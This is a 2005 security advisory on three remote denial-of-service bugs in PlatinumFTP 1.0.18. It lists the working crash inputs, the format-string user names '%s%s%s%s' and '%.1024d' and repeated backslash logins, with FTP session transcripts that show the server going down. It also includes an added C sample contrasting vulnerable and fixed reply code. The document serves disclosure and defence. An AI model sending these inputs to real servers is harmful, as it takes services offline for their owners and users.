PlatinumFTP 1.0.18 Bugs: Some information about the bugs I found in PlatinumFTP 1.0.18.


addition 20050312:

Gary posted some quite interesting news on FD a few minutes after I made this 'Disclosure'. The PlatinumFTP server uses an ActiveX control made by Mabry Software. And in fact it's this ActiveX part which is vulnerable.

Secunia - Mabry FTPServer/X Command Format String Vulnerability

OSVDB - Mabry FTPServer/X Command Username Format String Flaw


addition 20050313:

Bugtraq: PlatinumFTP 1.0.18 remote DoS

Securityfocus: PlatinumFTPServer Multiple Malformed User Name Connection DOS Vulnerability


addition 20050313:

milw0rm: PlatinumFTP <= 1.0.18 Multiple Remote Denial of Service Exploit





Application: PlatinumFTP

Site: http://www.roboshareware.com/indexplatinumftp.php

Version: 1.0.18 and maybe lower

OS: Windows

Bug: Remote Denial of Service



=====

Product:

PlatinumFTPserver simplifies management of all your Ftp clients with regards to sending and receiving program and data files over an IP connection.



=====

About:

I didn't find any information about the bugs I've found, and the vendor doesn't seem to be interested in fixing problems (see History). Since PlatinumFTP isn't a mainstream server, I decided to make this disclosure.


Well, I found 3 different ways to shut down (denial of service) a PlatinumFTP 1.0.18 server. At least you don't need a valid user.



=====

First Bug:

You can stop the server using %s%s%s%s as username.

Download: pftpdos2.pl


-------------------- schnipp --------------------

ports@boom:~$ ftp 192.168.10.101

Connected to 192.168.10.101.

220-PlatinumFTPserver V1.0.18

220 Enter login details

Name (192.168.10.101:ports): %s%s%s%s

421 Service not available, remote server has closed connection

Login failed.

No control connection for command: Transport endpoint is not connected

ftp>

-------------------- schnapp --------------------



=====

Second Bug:

You can stop the server using %.1024d as username.

Download: pftpdos3.pl


-------------------- schnipp --------------------

ports@boom:~$ ftp 192.168.10.101

Connected to 192.168.10.101.

220-PlatinumFTPserver V1.0.18

220 Enter login details

Name (192.168.10.101:ports): %.1024d

331 Password required for 000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000421 Service not available, remote server has closed connection

Login failed.

No control connection for command: Transport endpoint is not connected

ftp>

-------------------- schnapp --------------------



=====

Third Bug:

Download: pftpdos1.pl


Well, shutting down a server using the third bug is, compared to the first bugs, really tricky *cough*. If you put in a \ as username, the server will show a requester on its console saying 'Incorrect Format: HKEY_LOCAL_MACHINE\SOFTWARE\PlatinumFTPserver\Configuration\Users\'. The FTP login process for the current session will stop until someone confirms this message.


I wrote a little Perl script to see if it's possible to shut the server down, and it works. You just have to connect a couple of times using the username \ and after a few connections (>50) the server will crash.


Since most of you guys know how to write a script like that, I don't attach it :) Of course you can find them later on my homepage.
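
Added example (not part of the original advisory and not the vendor's or Mabry's code): the 331 reply in the second bug shows the user name being expanded as a printf-style format, so this C code puts the assumed bug pattern beside a fixed reply routine and a user-name filter that also rejects the \ from the third bug. All function names, the 64-byte limit and the code structure are assumptions, since the server and the ActiveX control are closed source.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
/* Hypothetical reply helper: formats one FTP reply line into out. */
static int send_reply(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int len = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return len;
}

/* Assumed bug pattern: the user name is pasted into the text that is then
 * used as the format, so every '%' in it is interpreted by printf. */
int reply_331_vulnerable(char *out, size_t n, const char *user)
{
    char line[256];
    snprintf(line, sizeof line, "331 Password required for %s\r\n", user);
    return send_reply(out, n, line);   /* line is used as the format */
}

/* Hardened: constant format string, user name passed only as data. */
int reply_331_safe(char *out, size_t n, const char *user)
{
    return send_reply(out, n, "331 Password required for %s\r\n", user);
}

/* Assumed policy: printable ASCII only, no '%' or '\\', at most 64 bytes. */
int username_ok(const char *user)
{
    size_t len = strlen(user);
    if (len == 0 || len > 64) return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)user[i];
        if (c < 0x21 || c > 0x7e || c == '%' || c == '\\') return 0;
    }
    return 1;
}

int main(void)
{
    char buf[512];
    /* Constructed probe: "%%" consumes no argument, so this is defined. */
    reply_331_vulnerable(buf, sizeof buf, "a%%b");
    printf("vulnerable: %s", buf);
    reply_331_safe(buf, sizeof buf, "a%%b");
    printf("safe:       %s", buf);
    return 0;
}
```

The vulnerable routine collapses the doubled percent sign in the probe while the safe routine echoes it unchanged, which is the same difference the 331 reply in the second bug makes visible.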



=====

History:

2005-03-05: Found the Bugs and mailed the vendor

2005-03-07: Mailed the vendor again using all mail addresses I found

2005-03-10: Created a Yahoo account *sigh* to make a forum post

2005-03-12: Still no response...